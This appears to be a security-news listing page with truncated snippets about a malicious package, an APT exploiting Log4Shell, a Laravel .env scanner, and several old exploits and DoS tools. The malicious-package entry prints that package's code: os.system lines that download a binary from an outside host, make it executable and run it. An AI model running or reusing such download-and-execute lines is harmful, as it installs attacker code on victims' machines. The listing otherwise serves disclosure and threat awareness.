Malicious Package

Overview test-packages-bad is a malicious package. This package downloads and runs malicious code on the victim host. Malicious Code python import os os.system"wget https://dark.devsecwise.com/cronjob.out /dev/null 2&1" os.system"chmod +x /home/$he/.metasploit/cronjob.out" os.system"./cronjob.out...

Deep Panda deploys new rootkit “Fire Chili” by exploiting Log4shell in VMware horizon

THREAT LEVEL: Red For a detailed advisory, download the pdf file here Deep Panda, a Chinese APT group, took advantage of the well-known Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor, rootkit, and steal sensitive data. This threat actor is primarily targeting firms in the...

laravelN00b - Automated Scan .env Files And Checking Debug Mode In Victim Host

Incorrect configuration allows you to access .env files or reading env variables. LaravelN00b automated scan .env files and checking debug mode in victim host. Scan rationale Scan host. Resolve IP adress and check .env file in IP Adress Checking debug mode Laravel Read .env variables Installation...

withinsecurity: DDOS using xmlrpc.php

Wordpress blogs that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can be made as a part of a huge botnet causing a major DDOS. The blog at withinsecurity.com has the xmlrpc.php file enabled and could thus be potentially used for such an attack against other victim hosts. In order to...

3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode Remote Overflow

3Com TFTP Service 3CTftpSvc 2.0.1 - Long Transporting Mode Remote Overflow 3comtftpdxpsp2.rb Copyright C cthulhu This is a poc intended to exploit the 3Com TFTP Service version 2.0.1 long transporting mode buffer overflow under xp sp2 english Vulnerability discovered by Liu Qixu Usage : ruby...

MailEnable Enterprise & Professional - https Remote Buffer Overflow

!/usr/bin/perl This tools and to consider only himself to educational purpose -=MailEnable Enterprise & Professional HTTPS remote BoF exploit=- -= =- -= Discovered & Coded by CorryL info:www.x0n3-h4ck.org=- -= irc.xoned.net x0n3-h4ck corryl80atgmail.com=- +Connecting to 127.0.0.1 +Sending Evil...

ngIRCd <= 0.8.2 Remote Format String Exploit

No description provided by source. / ngircdfsexp.c ngIRCd = 0.8.2 remote format string exploit Note: To obtain a successful exploitation, we need that ngIRCd has been compiled with IDENT, logging to SYSLOG and DEBUG enabled. Original Reference: http://www.nosystem.com.ar/advisories/advisory-11.tx...

TCP SYN - 'bang.c' Denial of Service

/ BANG.C Coded by Sorcerer of DALnet FUCKZ to: etech, blazin, udp, hybrid and kdl PROPZ : skrilla, thanks for all your help with JUNO-Z and especially this code : -------------------------------- REDIRECTION DOS FINALLY DISTRIBUTED !!!!!! This is POC and demonstrates a new method of DoS. The idea...